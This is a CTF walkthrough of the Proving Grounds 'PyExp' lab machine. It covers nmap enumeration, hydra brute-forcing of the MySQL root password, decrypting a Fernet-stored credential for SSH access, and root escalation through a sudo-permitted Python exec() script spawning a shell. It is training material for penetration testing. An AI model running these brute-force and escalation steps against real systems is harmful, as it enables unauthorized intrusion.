PyExp

Date: June 4th 2022

Author: j.info

Link: Proving Grounds on Offensive Security

PG Difficulty Rating: Easy

Objectives

• local.txt flag
• proof.txt flag

Initial Enumeration

Nmap Scan

sudo nmap -sV -sC -T4 192.168.57.118

PORT     STATE SERVICE VERSION
3306/tcp open  mysql   MySQL 5.5.5-10.3.23-MariaDB-0+deb10u1
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.3.23-MariaDB-0+deb10u1
|   Thread ID: 38
|   Capabilities flags: 63486
|   Some Capabilities: ConnectWithDatabase, FoundRows, SupportsCompression, DontAllowDatabaseTableColumn, SupportsTransactions, IgnoreSigpipes, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, Speaks41ProtocolNew, Speaks41ProtocolOld, InteractiveClient, LongColumnFlag, Support41Auth, ODBCClient, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: YD+Fa5%Xm<$::Tw|+[hx
|_  Auth Plugin Name: mysql_native_password

An additional all ports scan showed us:

PORT     STATE SERVICE VERSION
1337/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)

SQL Digging

I run another nmap against the database port using scripts and find some usernames:

nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 192.168.57.118

| mysql-enum: 
|   Valid usernames: 
|     root:<empty> - Valid credentials
|     netadmin:<empty> - Valid credentials
|     guest:<empty> - Valid credentials
|     user:<empty> - Valid credentials
|     web:<empty> - Valid credentials
|     sysadmin:<empty> - Valid credentials
|     administrator:<empty> - Valid credentials
|     webadmin:<empty> - Valid credentials
|     admin:<empty> - Valid credentials
|     test:<empty> - Valid credentials

I try and login with these but it doesn’t work on any of them.

I give hydra a try and am able to brute force the password for root:

hydra -l root -P rockyou.txt 192.168.57.118 mysql

[DATA] attacking mysql://192.168.57.118:3306/
[STATUS] 1633.00 tries/min, 4899 tries in 00:03h, 14339500 to do in 146:22h, 4 active
[3306][mysql] host: 192.168.57.118   login: root   password: <REDACTED>
1 of 1 target successfully completed, 1 valid password found

Logging into the database:

mysql -h 192.168.57.118 -u root -p

Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 28097
Server version: 10.3.23-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]>

show databases;

+--------------------+
| Database           |
+--------------------+
| data               |
| information_schema |
| mysql              |
| performance_schema |
+--------------------+

In the mysql database under the user table we’re able to find the root hash:

root | *E8F12B9427BF0A7B2B2EA610BD8ADBE683C4C262

And in the data database under the fernet table we see:

+--------------------------------------------------------------------------------------------------------------------------+----------------------------------------------+
| cred                                                                                                                     | keyy                                         |
+--------------------------------------------------------------------------------------------------------------------------+----------------------------------------------+
| gAAAAABfMbX0bqWJTTdHKUYYG9U5Y6JGCpgEiLqmYIVlWB7t8gvsuayfhLOO_cHnJQF1_ibv14si1MbL7Dgt9Odk8mKHAXLhyHZplax0v02MMzh_z_eI7ys= | UJ5_V_b-TWKKyzlErA96f-9aEnQEfdjFbRKt8ULjdV0= |
+--------------------------------------------------------------------------------------------------------------------------+----------------------------------------------+

I try and decode those strings with base64 since they look like they could be encoded that way but don’t have any luck.

I do a google search for fernet and find it’s a symmetric encryption algorithm. Given we have a key we should hopefully be able to decrypt the cred with the key.

I read about how to decrypt Fernet here at cryptography.io and write a quick python script to decrypt it:

from cryptography.fernet import Fernet
key = 'UJ5_V_b-TWKKyzlErA96f-9aEnQEfdjFbRKt8ULjdV0='
token = b'gAAAAABfMbX0bqWJTTdHKUYYG9U5Y6JGCpgEiLqmYIVlWB7t8gvsuayfhLOO_cHnJQF1_ibv14si1MbL7Dgt9Odk8mKHAXLhyHZplax0v02MMzh_z_eI7ys='
f = Fernet(key)
print(f.decrypt(token))

And when running it with python3 fernet.py we get back:

b'lucy:<REDACTED>'

System Access

It worked! We were able to decrypt a username and password with our script. Connecting over via ssh:

ssh lucy@192.168.57.118 -p 1337

lucy@192.168.57.118's password: 
Linux pyexp 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
lucy@pyexp:~$

System Enumeration

The local.txt flag is waiting for us in our home directory:

wc -c local.txt

33 local.txt

I check sudo -l and see:

Matching Defaults entries for lucy on pyexp:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User lucy may run the following commands on pyexp:
    (root) NOPASSWD: /usr/bin/python2 /opt/exp.py

Take a look at the /opt/exp.py script:

uinput = raw_input('how are you?')
exec(uinput)

So this code will run whatever we input via exec.

I try and get it to run bash:

sudo /usr/bin/python2 /opt/exp.py

how are you?bash
Traceback (most recent call last):
  File "/opt/exp.py", line 2, in <module>
    exec(uinput)
  File "<string>", line 1, in <module>
NameError: name 'bash' is not defined

raw_input() returns whatever you enter as a string as opposed to input() which will run any input as a python expression.

Root

After some experimentation trying different things the following worked for me and I was able to escalate over to root:

how are you?import pty;pty.spawn("/bin/bash")
root@pyexp:/home/lucy#

Checking out the proof.txt in /root:

wc -c /root/proof.txt

33 /root/proof.txt

With that we’ve completed this CTF!

Conclusion

A quick run down of what we covered in this CTF:

• Basic enumeration using nmap
• Using hydra to brute force our way into the exposed mysql database
• Finding some Fernet encrypted credentials and the encryption key stored in the database
• Writing a quick python script to decrypt the credentials allowing us to ssh over to the system for our initial foothold
• Looking at sudo -l and seeing we have the ability to run a specific python script as root, and using that to escalate to root

Many thanks to:

• Offensive Security for hosting this CTF